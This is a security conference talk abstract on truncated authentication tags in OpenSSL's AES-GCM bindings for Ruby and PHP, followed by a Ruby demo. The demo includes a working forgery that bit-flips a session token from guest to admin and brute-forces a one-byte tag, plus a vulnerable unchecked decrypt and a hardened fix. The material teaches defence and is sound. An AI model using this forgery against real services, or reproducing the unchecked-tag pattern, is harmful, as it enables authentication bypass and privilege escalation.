Exploiting the not so misuse-resistant AES-GCM API of OpenSSL
Félix Charette
NorthSec 2025 · Day 2 · Ville-Marie
AES-GCM is sound as a construction, but OpenSSL's bindings for Ruby and PHP carry a documented yet widely overlooked pitfall: neither language's standard decrypt function checks the length of the authentication tag the caller supplies. The tag is handed to OpenSSL as-is, so a one-byte tag is accepted as readily as the full sixteen-byte tag, and only that one byte is compared. This collapses the integrity check from a 128-bit guarantee to a brute-force target of at most 256 guesses, enabling ciphertext forgery and, under certain conditions, full plaintext recovery through a format-validity oracle. Félix Charette walks through how to identify vulnerable codepaths, craft shortened-tag payloads, flip plaintext bits by XORing the ciphertext (GCM encrypts in CTR mode, so the ciphertext is malleable once the tag no longer protects it), and decrypt unknown values by observing how the application parses the result.
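The forgery path the abstract describes, written out in Ruby as an added example (this is not code from the talk or from the Ruby openssl gem): a server-side decrypt that passes the caller's tag straight to OpenSSL, an attacker who only sees accept/reject, a CTR bit-flip that rewrites a known field, and a 256-way brute force of a one-byte tag. The key, IV, AAD and the `user=...;role=...` token format are constructed for the demo; the hardened variant shows the length check the vulnerable pattern is missing.

```ruby
require 'openssl'

GCM_TAG_LEN = 16 # full AES-GCM tag length in bytes

# Byte-wise XOR of two equal-length binary strings.
def xor_bytes(a, b)
  raise ArgumentError, 'length mismatch' unless a.bytesize == b.bytesize
  a.bytes.zip(b.bytes).map { |x, y| x ^ y }.pack('C*')
end

# Encrypt with AES-128-GCM; returns [ciphertext, full 16-byte tag].
def aes_gcm_encrypt(key, iv, plaintext, aad)
  c = OpenSSL::Cipher.new('aes-128-gcm').encrypt
  c.key = key
  c.iv = iv
  c.auth_data = aad
  ct = c.update(plaintext) + c.final
  [ct, c.auth_tag]
end

# Vulnerable pattern: the tag goes to OpenSSL at whatever length the caller
# supplied. OpenSSL accepts 1..16 bytes and compares only that many bytes of
# the computed tag, so a 1-byte tag turns the MAC into a 256-way guess.
def decrypt_unchecked_tag(key, iv, ct, tag, aad)
  c = OpenSSL::Cipher.new('aes-128-gcm').decrypt
  c.key = key
  c.iv = iv
  c.auth_tag = tag        # no length check here
  c.auth_data = aad
  c.update(ct) + c.final  # final raises CipherError when the (truncated) tag mismatches
end

# Hardened pattern: refuse anything but a full-length tag before decrypting.
def decrypt_checked_tag(key, iv, ct, tag, aad)
  unless tag.bytesize == GCM_TAG_LEN
    raise OpenSSL::Cipher::CipherError, "tag must be #{GCM_TAG_LEN} bytes, got #{tag.bytesize}"
  end
  decrypt_unchecked_tag(key, iv, ct, tag, aad)
end

# Attacker's view of the server: only whether the message was accepted.
def accept_oracle(key, iv, aad)
  lambda do |ct, tag|
    begin
      decrypt_unchecked_tag(key, iv, ct, tag, aad)
      true
    rescue OpenSSL::Cipher::CipherError
      false
    end
  end
end

# Attacker side, no key: rewrite known plaintext bytes via CTR malleability
# (ct XOR known XOR target), then brute-force the 1-byte tag.
# Returns [forged_ct, short_tag, queries_used] or nil.
def forge_with_short_tag(ct, known_pt, target_pt, oracle)
  forged_ct = xor_bytes(ct, xor_bytes(known_pt, target_pt))
  (0..255).each do |guess|
    tag = [guess].pack('C')
    return [forged_ct, tag, guess + 1] if oracle.call(forged_ct, tag)
  end
  nil
end

def demo
  # Constructed demo material: random key/IV, made-up token format.
  key = OpenSSL::Random.random_bytes(16)
  iv  = OpenSSL::Random.random_bytes(12)
  aad = 'session-v1'
  known_pt  = 'user=alice;role=guest' # attacker knows the layout; same length as target
  target_pt = 'user=alice;role=admin'
  ct, _full_tag = aes_gcm_encrypt(key, iv, known_pt, aad)

  forged_ct, short_tag, queries =
    forge_with_short_tag(ct, known_pt, target_pt, accept_oracle(key, iv, aad))

  # Check for the demo only (the attacker cannot do this): the byte found is
  # the first byte of the genuine tag OpenSSL computes for the forged ciphertext.
  genuine_tag = aes_gcm_encrypt(key, iv, target_pt, aad)[1]
  hardened_rejects = begin
    decrypt_checked_tag(key, iv, forged_ct, short_tag, aad)
    false
  rescue OpenSSL::Cipher::CipherError
    true
  end

  {
    forged_plaintext: decrypt_unchecked_tag(key, iv, forged_ct, short_tag, aad),
    queries: queries,
    tag_is_genuine_prefix: short_tag == genuine_tag.byteslice(0, 1),
    hardened_rejects: hardened_rejects
  }
end

puts demo.inspect if __FILE__ == $PROGRAM_NAME
```

Each oracle query builds a fresh cipher context, mirroring a server that decrypts one request at a time; the brute force never needs more than 256 requests because OpenSSL compares only the supplied byte against the first byte of the real tag. The same length check belongs in front of PHP's `openssl_decrypt`, whose `$tag` argument is passed through in the same way.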